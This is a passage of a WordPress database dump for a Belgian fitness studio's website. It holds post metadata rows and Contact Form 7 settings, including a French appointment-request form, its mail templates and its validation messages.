(718, 257, '_messages', 'a:21:{s:12:\"mail_sent_ok\";s:43:\"Your message was sent successfully. Thanks.\";s:12:\"mail_sent_ng\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:16:\"validation_error\";s:74:\"Validation errors occurred. Please confirm the fields and submit it again.\";s:4:\"spam\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:12:\"accept_terms\";s:35:\"Please accept the terms to proceed.\";s:16:\"invalid_required\";s:31:\"Please fill the required field.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:14:\"invalid_number\";s:28:\"Number format seems invalid.\";s:16:\"number_too_small\";s:25:\"This number is too small.\";s:16:\"number_too_large\";s:25:\"This number is too large.\";s:13:\"invalid_email\";s:28:\"Email address seems invalid.\";s:11:\"invalid_url\";s:18:\"URL seems invalid.\";s:11:\"invalid_tel\";s:31:\"Telephone number seems invalid.\";s:13:\"upload_failed\";s:22:\"Failed to upload file.\";s:24:\"upload_file_type_invalid\";s:30:\"This file type is not allowed.\";s:21:\"upload_file_too_large\";s:23:\"This file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"Failed to upload file. Error occurred.\";s:23:\"quiz_answer_not_correct\";s:27:\"Your answer is not correct.\";s:12:\"invalid_date\";s:26:\"Date format seems invalid.\";s:14:\"date_too_early\";s:23:\"This date is too early.\";s:13:\"date_too_late\";s:22:\"This date is too late.\";}'),
(719, 257, '_additional_settings', ''),
(720, 258, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(721, 258, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883153:1\";}\";'),
(722, 258, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(723, 259, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(724, 259, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883297:1\";}\";'),
(725, 259, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(726, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(727, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883379:1\";}\";'),
(728, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(729, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(730, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883440:1\";}\";'),
(731, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(732, 260, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(733, 260, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883500:1\";}\";'),
(734, 260, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(735, 261, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(736, 261, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883575:1\";}\";'),
(737, 261, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(738, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(739, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883610:1\";}\";'),
(740, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(741, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(742, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883672:1\";}\";'),
(743, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(744, 262, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(745, 262, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883732:1\";}\";'),
(746, 262, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(747, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(748, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883785:1\";}\";'),
(749, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(750, 263, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(751, 263, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883846:1\";}\";'),
(752, 263, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(753, 264, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(754, 264, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883852:1\";}\";');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(755, 264, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(756, 265, '_form', '<p>Votre nom (obligatoire)<br />\n    [text* your-name] <br>\nVotre prénom (obligatoire)<br />\n    [text* your-firstname] <br>\nVotre email (obligatoire)<br />\n    [email* your-email] <br>\nVotre n° de téléphone (obligatoire)<br />\n    [text* your-tel]<br>\n[captchac captcha-696]<br>\nVeuillez recopier les caractères ci-dessus<br />\n    [captchar captcha-696] </p>\n\n<p>[submit \"Contactez moi pour un RDV Séance Booster\"]</p>'),
(979, 317, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(757, 265, '_mail', 'a:7:{s:7:\"subject\";s:24:\"Demande séance gratuite\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:255:\"De : [your-name] <[your-email]>\nSujet : Demande séance gratuite\n\nDemande de séance gratuite :\n[your-name]\n[your-firstname]\n[your-email]\n[your-tel]\n\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:25:\"juliepierrard@hotmail.com\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(758, 265, '_mail_2', 'a:8:{s:6:\"active\";b:1;s:7:\"subject\";s:24:\"Demande séance gratuite\";s:6:\"sender\";s:26:\"[your-name] <[your-email]>\";s:4:\"body\";s:255:\"De : [your-name] <[your-email]>\nSujet : Demande séance gratuite\n\nDemande de séance gratuite :\n[your-name]\n[your-firstname]\n[your-email]\n[your-tel]\n\n\n--\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\";s:9:\"recipient\";s:12:\"stv@otvr.net\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;}'),
(759, 265, '_messages', 'a:21:{s:12:\"mail_sent_ok\";s:42:\"Votre message a bien été envoyé. Merci.\";s:12:\"mail_sent_ng\";s:116:\"Erreur lors de l\'envoi du message. Veuillez réessayer plus tard ou contacter l\'administrateur d\'une autre manière.\";s:16:\"validation_error\";s:76:\"Erreur de validation. Veuillez vérifier les champs et soumettre à nouveau.\";s:4:\"spam\";s:116:\"Erreur lors de l\'envoi du message. Veuillez réessayer plus tard ou contacter l\'administrateur d\'une autre manière.\";s:12:\"accept_terms\";s:61:\"Merci de bien vouloir accepter les conditions pour continuer.\";s:16:\"invalid_required\";s:38:\"Veuillez remplir le champ obligatoire.\";s:17:\"captcha_not_match\";s:28:\"Le code entre est incorrect.\";s:14:\"invalid_number\";s:37:\"Le format numérique semble invalide.\";s:16:\"number_too_small\";s:25:\"Ce nombre est trop petit.\";s:16:\"number_too_large\";s:25:\"Ce nombre est trop grand.\";s:13:\"invalid_email\";s:32:\"L\'adresse email semble invalide.\";s:11:\"invalid_url\";s:22:\"L\'URL semble invalide.\";s:11:\"invalid_tel\";s:42:\"Le numéro de téléphone semble invalide.\";s:13:\"upload_failed\";s:39:\"Impossible de télécharger le fichier.\";s:24:\"upload_file_type_invalid\";s:39:\"Ce type de fichier n\'est pas autorisé.\";s:21:\"upload_file_too_large\";s:31:\"Ce fichier est trop volumineux.\";s:23:\"upload_failed_php_error\";s:64:\"Impossible de télécharger le fichier. Une erreur est survenue.\";s:23:\"quiz_answer_not_correct\";s:30:\"Votre réponse est incorrecte.\";s:12:\"invalid_date\";s:34:\"Le format de date semble invalide.\";s:14:\"date_too_early\";s:25:\"Cette date est trop tôt.\";s:13:\"date_too_late\";s:25:\"Cette date est trop tard.\";}'),
(760, 265, '_additional_settings', ''),
(761, 266, '_edit_last', '1'),
(762, 266, '_wp_page_template', 'default'),
(763, 266, '_edit_lock', '1409471491:1'),
(764, 267, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(765, 267, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(766, 267, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884222:1\";}\";'),
(767, 268, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(768, 268, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883821:1\";}\";'),
(769, 268, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(770, 269, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(771, 269, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372881523:1\";}\";'),
(772, 269, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(773, 270, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(774, 270, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371390907:1\";}\";'),
(775, 270, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(776, 271, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(777, 271, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372883262:1\";}\";'),
(778, 271, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(779, 272, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(780, 272, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1371391117:1\";}\";'),
(781, 272, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(782, 273, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(783, 273, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372878623:1\";}\";'),
(784, 273, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(785, 274, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(786, 274, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(787, 274, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884279:1\";}\";'),
(788, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(789, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(790, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884313:1\";}\";'),
(791, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(792, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(793, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884374:1\";}\";'),
(794, 276, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(795, 276, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(796, 276, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884434:1\";}\";'),
(797, 277, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(798, 277, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(799, 277, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372884494:1\";}\";'),
(800, 278, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(801, 278, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372885467:1\";}\";'),
(802, 278, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1495, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(806, 279, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(807, 279, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955014:1\";}\";'),
(808, 279, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1494, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1493, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1492, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771581:1\";}\";'),
(1491, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1490, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1489, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(818, 280, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(819, 280, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955219:1\";}\";'),
(820, 280, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(821, 281, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(822, 281, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955305:1\";}\";'),
(823, 281, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(824, 282, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(825, 282, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955328:1\";}\";'),
(826, 282, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(827, 283, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(828, 283, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955511:1\";}\";'),
(829, 283, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(830, 284, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(831, 284, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955611:1\";}\";'),
(832, 284, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(833, 285, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(834, 285, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372955657:1\";}\";'),
(835, 285, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(836, 286, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(837, 286, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372961920:1\";}\";'),
(838, 286, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(839, 287, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(840, 287, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372961944:1\";}\";'),
(841, 287, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(842, 288, '_wp_attached_file', '2013/07/illu1.png'),
(843, 288, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:271;s:6:\"height\";i:197;s:4:\"file\";s:17:\"2013/07/illu1.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"illu1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(844, 289, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(845, 289, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372963855:1\";}\";'),
(846, 289, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(847, 290, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(848, 290, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372963904:1\";}\";'),
(849, 290, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(850, 291, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(851, 291, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372963931:1\";}\";'),
(852, 291, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(853, 292, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(854, 292, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372963949:1\";}\";'),
(855, 292, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1576, 397, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464421:1\";}\";'),
(1575, 397, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(859, 293, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(860, 293, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964426:1\";}\";'),
(861, 293, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(862, 294, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(863, 294, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964444:1\";}\";'),
(864, 294, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1574, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1573, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(868, 295, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(869, 295, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964533:1\";}\";'),
(870, 295, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1572, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464405:1\";}\";'),
(1571, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(874, 296, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(875, 296, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964640:1\";}\";'),
(876, 296, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1570, 396, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1569, 396, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(880, 297, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(881, 297, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964860:1\";}\";'),
(882, 297, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1568, 396, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464208:1\";}\";'),
(1567, 396, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1566, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1565, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1564, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464178:1\";}\";'),
(889, 298, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(890, 298, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372964987:1\";}\";'),
(891, 298, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(892, 299, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(893, 299, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965039:1\";}\";'),
(894, 299, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(895, 300, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(896, 300, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965074:1\";}\";'),
(897, 300, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1563, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1562, 395, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(901, 301, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(902, 301, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965175:1\";}\";'),
(903, 301, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1561, 395, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1560, 395, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464046:1\";}\";'),
(907, 302, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(908, 302, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965271:1\";}\";'),
(909, 302, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(910, 303, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(911, 303, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965299:1\";}\";'),
(912, 303, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(913, 304, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(914, 304, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965350:1\";}\";'),
(915, 304, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(916, 305, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(917, 305, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965366:1\";}\";'),
(918, 305, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(919, 306, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(920, 306, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965384:1\";}\";'),
(921, 306, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(922, 307, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(923, 307, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965406:1\";}\";'),
(924, 307, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(925, 308, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(926, 308, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965428:1\";}\";'),
(927, 308, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(928, 309, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(929, 309, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965446:1\";}\";'),
(930, 309, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(931, 310, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(932, 310, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965459:1\";}\";'),
(933, 310, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1558, 393, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1557, 393, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(940, 311, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(941, 311, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965656:1\";}\";'),
(942, 311, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1556, 393, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1555, 393, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1554, 393, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383772570:1\";}\";'),
(1553, 393, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1336, 358, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(949, 312, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(950, 312, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965838:1\";}\";'),
(951, 312, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(952, 313, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(953, 313, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965874:1\";}\";'),
(954, 313, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(955, 314, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(956, 314, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372965906:1\";}\";'),
(957, 314, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(958, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(959, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(960, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966054:1\";}\";'),
(961, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(962, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(963, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966116:1\";}\";'),
(964, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(965, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(966, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966176:1\";}\";'),
(967, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(968, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(969, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966237:1\";}\";'),
(970, 275, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(971, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(972, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966296:1\";}\";'),
(973, 315, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(974, 315, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(975, 315, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966357:1\";}\";'),
(976, 316, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(977, 316, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(978, 316, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966399:1\";}\";'),
(980, 317, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966645:1\";}\";'),
(981, 317, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(982, 318, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(983, 318, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966701:1\";}\";'),
(984, 318, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(985, 319, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(986, 319, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966723:1\";}\";'),
(987, 319, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(988, 320, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(989, 320, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373470968:1\";}\";'),
(990, 320, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1488, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1487, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(994, 321, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(995, 321, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471048:1\";}\";'),
(996, 321, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(997, 322, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
